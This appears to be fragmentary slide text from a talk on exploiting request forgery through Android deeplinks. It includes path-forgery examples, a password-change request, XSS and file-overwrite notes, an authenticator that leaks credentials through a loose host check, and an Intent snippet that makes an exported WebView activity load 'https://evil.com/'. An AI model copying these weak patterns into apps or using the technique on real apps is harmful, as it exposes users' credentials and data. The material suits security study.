Exploiting Request forgery on Mobile Applications.

init();

Request Forgery

Deeplinks is evil. No, Not WebView again.

while ((current = path.indexOf('/', previous)) > -1) {
// This check keeps us from adding a segment if the path starts
// '/' and an empty segment for "//".
if (previous < current) {
String decodedSegment
= decode(path.substring(previous, current));
segmentBuilder.add(decodedSegment);
}
previous = current + 1;
}

What after forgery Path?

POST /change HTTP/1.1
....

password=123456
POST /change?password=123456 HTTP/1.1
....

GET Requests? Anyway to exploit?

{
"username":"dphoeniixx",
"about": "<h1>Hello on my profile</h1>", // XSS?
"resumes_uri": "/resumes/dphoeniixx-id" // another Request forgery!
"something_will_be_downloaded": "https://examples.com/files/resumes(.zip|cvs)" // overwrite files!
}

No controlled endpoint response? Open redirect is very helpful!

protected Authenticator getBasicAuth(final String username, final String password) {
return new Authenticator() {
@Override
public Request authenticate(Proxy proxy, Response response) throws IOException {
String credential = Credentials.basic(username, password);
if(response.request().url().host().contains("www.whitelist.com")){
return response.request().newBuilder().header("Authorization", credential).build();
}else{
return response.request();
}
}
@Override
public Request authenticateProxy(Proxy proxy, Response response) throws IOException {
return null;
}
};
}

We didn’t finish here!

Special Cases

<activity android:exported="true" android:name="com.example.MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="https"/>
<data android:host="whitelist.com"/>
</intent-filter>
</activity>
protected void onCreate(Bundle bun) {
super.onCreate(bun);
webView.loadUrl(getIntent.getData().toString);
}
Intent evil = new Intent(Intent.ACTION_MAIN);
evil.setData(Uri.parse("https://evil.com/"));
evil.setComponent(new ComponentName("com.example", "com.example.MainActivity"));
startActivity(evil);

1st case study

In Final